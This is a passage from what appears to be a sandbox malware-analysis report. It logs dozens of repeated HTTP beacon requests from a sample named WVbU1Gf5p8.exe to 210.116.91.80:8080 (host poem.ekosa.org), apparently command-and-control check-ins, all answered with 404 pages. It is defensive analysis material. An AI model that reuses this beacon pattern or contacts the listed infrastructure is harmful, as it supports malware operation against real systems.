      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      270192.168.2.450050210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      271192.168.2.450051210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      272192.168.2.450052210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      273192.168.2.450053210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      274192.168.2.450054210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      275192.168.2.450055210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      276192.168.2.450056210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      277192.168.2.450057210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      278192.168.2.450058210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      279192.168.2.450059210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      28192.168.2.449792210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:13.708411932 CET399OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:13.967778921 CET411INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:13 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      280192.168.2.450060210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      281192.168.2.450061210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      282192.168.2.450062210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      283192.168.2.450063210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      284192.168.2.450064210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      29192.168.2.449793210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:14.233062029 CET436OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:14.494489908 CET455INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:13 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      3192.168.2.449761210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:54:58.403862000 CET101OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:54:58.668386936 CET106INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:54:57 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      30192.168.2.449796210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:14.876337051 CET463OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:15.145694017 CET463INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:15 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      31192.168.2.449797210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:15.415507078 CET464OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:15.679867029 CET464INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:15 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      32192.168.2.449798210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:15.947823048 CET465OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:16.212260962 CET466INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:16 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      33192.168.2.449799210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:16.591037035 CET466OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:16.858326912 CET467INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:16 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      34192.168.2.449800210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:17.132344007 CET468OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:17.399684906 CET468INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:17 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      35192.168.2.449801210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:17.660536051 CET469OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:17.917649031 CET470INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:17 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      36192.168.2.449802210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:18.294675112 CET470OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
